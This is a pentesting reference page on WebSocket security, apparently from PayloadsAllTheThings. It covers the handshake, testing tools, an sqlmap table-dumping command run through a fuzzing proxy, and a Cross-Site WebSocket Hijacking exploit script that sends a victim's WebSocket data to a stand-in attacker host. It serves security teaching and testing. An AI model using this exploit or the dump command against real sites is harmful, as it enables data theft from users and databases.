index.md (8288B)
1 --- 2 title: "Web Sockets" 3 topic: "Web Sockets" 4 topicSlug: "web-sockets" 5 sourcePath: "Web Sockets/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Web%20Sockets/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # Web Sockets 12 13 > WebSocket is a communication protocol that provides full-duplex communication channels over a single, long-lived connection. This enables real-time, bi-directional communication between clients (typically web browsers) and servers through a persistent connection. WebSockets are commonly used for web applications that require frequent, low-latency updates, such as live chat applications, online gaming, real-time notifications, and financial trading platforms. 14 15 ## Summary 16 17 * [Tools](#tools) 18 * [Methodology](#methodology) 19 * [Web Socket Protocol](#web-socket-protocol) 20 * [SocketIO](#socketio) 21 * [Using wsrepl](#using-wsrepl) 22 * [Using ws-harness.py](#using-ws-harnesspy) 23 * [Cross-Site WebSocket Hijacking (CSWSH)](#cross-site-websocket-hijacking-cswsh) 24 * [Labs](#labs) 25 * [References](#references) 26 27 ## Tools 28 29 * [doyensec/wsrepl](https://github.com/doyensec/wsrepl) - WebSocket REPL for pentesters 30 * [mfowl/ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py) 31 * [PortSwigger/websocket-turbo-intruder](https://github.com/PortSwigger/websocket-turbo-intruder) - Fuzz WebSockets with custom Python code 32 * [snyk/socketsleuth](https://github.com/snyk/socketsleuth) - Burp Extension to add additional functionality for pentesting websocket based applications 33 34 ## Methodology 35 36 ### Web Socket Protocol 37 38 WebSockets start as a normal `HTTP/1.1` request and then upgrade the connection to use the WebSocket protocol. 39 40 The client sends a specially crafted HTTP request with headers indicating it wants to switch to the WebSocket protocol: 41 42 ```http 43 GET /chat HTTP/1.1 44 Host: example.com:80 45 Upgrade: websocket 46 Connection: Upgrade 47 Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ== 48 Sec-WebSocket-Version: 13 49 ``` 50 51 Server responds with an `HTTP 101 Switching Protocols` response. If the server accepts the request, it replies like this. 52 53 ```http 54 HTTP/1.1 101 Switching Protocols 55 Upgrade: websocket 56 Connection: Upgrade 57 Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo= 58 ``` 59 60 ### SocketIO 61 62 Socket.IO is a JavaScript library (for both client and server) that provides a higher-level abstraction over WebSockets, designed to make real-time communication easier and more reliable across browsers and environments. 63 64 ### Using wsrepl 65 66 `wsrepl`, a tool developed by Doyensec, aims to simplify the auditing of websocket-based apps. It offers an interactive REPL interface that is user-friendly and easy to automate. The tool was developed during an engagement with a client whose web application heavily relied on WebSockets for soft real-time communication. 67 68 wsrepl is designed to provide a balance between an interactive REPL experience and automation. It is built with Python’s TUI framework Textual, and it interoperates with curl’s arguments, making it easy to transition from the Upgrade request in Burp to wsrepl. It also provides full transparency of WebSocket opcodes as per RFC 6455 and has an automatic reconnection feature in case of disconnects. 69 70 ```ps1 71 pip install wsrepl 72 wsrepl -u URL -P auth_plugin.py 73 ``` 74 75 Moreover, wsrepl simplifies the process of transitioning into WebSocket automation. Users just need to write a Python plugin. The plugin system is designed to be flexible, allowing users to define hooks that are executed at various stages of the WebSocket lifecycle (init, on_message_sent, on_message_received, ...). 76 77 ```py 78 from wsrepl import Plugin 79 from wsrepl.WSMessage import WSMessage 80 81 import json 82 import requests 83 84 class Demo(Plugin): 85 def init(self): 86 token = requests.get("https://example.com/uuid").json()["uuid"] 87 self.messages = [ 88 json.dumps({ 89 "auth": "session", 90 "sessionId": token 91 }) 92 ] 93 94 async def on_message_sent(self, message: WSMessage) -> None: 95 original = message.msg 96 message.msg = json.dumps({ 97 "type": "message", 98 "data": { 99 "text": original 100 } 101 }) 102 message.short = original 103 message.long = message.msg 104 105 async def on_message_received(self, message: WSMessage) -> None: 106 original = message.msg 107 try: 108 message.short = json.loads(original)["data"]["text"] 109 except: 110 message.short = "Error: could not parse message" 111 112 message.long = original 113 ``` 114 115 ### Using ws-harness.py 116 117 Start `ws-harness` to listen on a web-socket, and specify a message template to send to the endpoint. 118 119 ```powershell 120 python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt 121 ``` 122 123 The content of the message should contains the **[FUZZ]** keyword. 124 125 ```json 126 { 127 "auth_user":"dGVzda==", 128 "auth_pass":"[FUZZ]" 129 } 130 ``` 131 132 Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket. 133 134 ```python 135 sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump 136 ``` 137 138 ## Cross-Site WebSocket Hijacking (CSWSH) 139 140 If the WebSocket handshake is not correctly protected using a CSRF token or a 141 nonce, it's possible to use the authenticated WebSocket of a user on an 142 attacker's controlled site because the cookies are automatically sent by the 143 browser. This attack is called Cross-Site WebSocket Hijacking (CSWSH). 144 145 Example exploit, hosted on an attacker's server, that exfiltrates the received 146 data from the WebSocket to the attacker: 147 148 ```html 149 <script> 150 ws = new WebSocket('wss://vulnerable.example.com/messages'); 151 ws.onopen = function start(event) { 152 ws.send("HELLO"); 153 } 154 ws.onmessage = function handleReply(event) { 155 fetch('https://attacker.example.net/?'+event.data, {mode: 'no-cors'}); 156 } 157 ws.send("Some text sent to the server"); 158 </script> 159 ``` 160 161 You have to adjust the code to your exact situation. E.g. if your web 162 application uses a `Sec-WebSocket-Protocol` header in the handshake request, 163 you have to add this value as a 2nd parameter to the `WebSocket` function call 164 in order to add this header. 165 166 ## Labs 167 168 * [PortSwigger - Manipulating WebSocket messages to exploit vulnerabilities](https://portswigger.net/web-security/websockets/lab-manipulating-messages-to-exploit-vulnerabilities) 169 * [PortSwigger - Cross-site WebSocket hijacking](https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking/lab) 170 * [PortSwigger - Manipulating the WebSocket handshake to exploit vulnerabilities](https://portswigger.net/web-security/websockets/lab-manipulating-handshake-to-exploit-vulnerabilities) 171 * [Root Me - Web Socket - 0 protection](https://www.root-me.org/en/Challenges/Web-Client/Web-Socket-0-protection) 172 173 ## References 174 175 * [Cross Site WebSocket Hijacking with socketio - Jimmy Li - August 17, 2020](https://web.archive.org/web/20201031111408/https://blog.jimmyli.us/articles/2020-08/Cross-Site-WebSocket-Hijacking-With-SocketIO) 176 * [Hacking Web Sockets: All Web Pentest Tools Welcomed - Michael Fowl - March 5, 2019](https://web.archive.org/web/20190306170840/https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/) 177 * [Hacking with WebSockets - Mike Shema, Sergey Shekyan, Vaagn Toukharian - September 20, 2012](https://web.archive.org/web/20120920142933/https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf) 178 * [Mini WebSocket CTF - Snowscan - January 27, 2020](https://snowscan.io/bbsctf-evilconneck/#) 179 * [Streamlining Websocket Pentesting with wsrepl - Andrez Konstantinov - July 18, 2023](https://web.archive.org/web/20230718132013/https://blog.doyensec.com/2023/07/18/streamlining-websocket-pentesting-with-wsrepl.html) 180 * [Testing for WebSockets security vulnerabilities - PortSwigger - September 28, 2019](https://web.archive.org/web/20190928112120/https://portswigger.net/web-security/websockets) 181 * [WebSocket Attacks - HackTricks - July 19, 2024](https://web.archive.org/web/20241217220834/https://book.hacktricks.xyz/pentesting-web/websocket-attacks)